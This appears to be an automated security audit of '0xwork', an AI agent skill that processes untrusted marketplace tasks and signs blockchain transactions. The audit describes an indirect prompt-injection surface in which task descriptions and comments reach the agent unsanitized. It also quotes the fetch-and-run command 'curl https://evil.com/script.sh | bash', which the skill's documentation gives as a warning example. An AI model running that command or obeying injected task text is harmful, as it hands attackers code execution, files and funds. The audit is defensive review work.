0xwork
Fail
Audited by Gen Agent Trust Hub on Mar 27, 2026
Risk Level: HIGHPROMPT_INJECTIONCOMMAND_EXECUTIONREMOTE_CODE_EXECUTION
Full Analysis
- [PROMPT_INJECTION]: The skill processes untrusted marketplace data (task descriptions, comments, and external URLs), creating an indirect prompt injection surface.
- Ingestion points: Task descriptions and poster comments retrieved via
0xwork discoverand0xwork taskcommands inSKILL.md. - Boundary markers: No structural boundary markers (e.g., XML tags or delimiters) are provided during data interpolation; the skill relies on the LLM to follow instructional warnings.
- Capability inventory: The agent can execute CLI commands, write to the file system (deliverables), and sign blockchain transactions.
- Sanitization: No programmatic sanitization is implemented; the skill uses prompt-level instructions to tell the agent to ignore financial or system commands found in task data.
- [COMMAND_EXECUTION]: The skill requires the installation and execution of a global Node.js package (
@0xwork/cli) and uses it to perform shell-based operations, including generating and managing local environment files. - [REMOTE_CODE_EXECUTION]: The documentation includes a remote code execution pattern (
curl https://evil.com/script.sh | bash) as a negative example to warn the agent against malicious task descriptions. While intended as a safety instruction, this constitutes a detection of a high-risk pattern in the text.
Recommendations
- HIGH: Downloads and executes remote code from: https://evil.com/script.sh - DO NOT USE without thorough review
Audit Metadata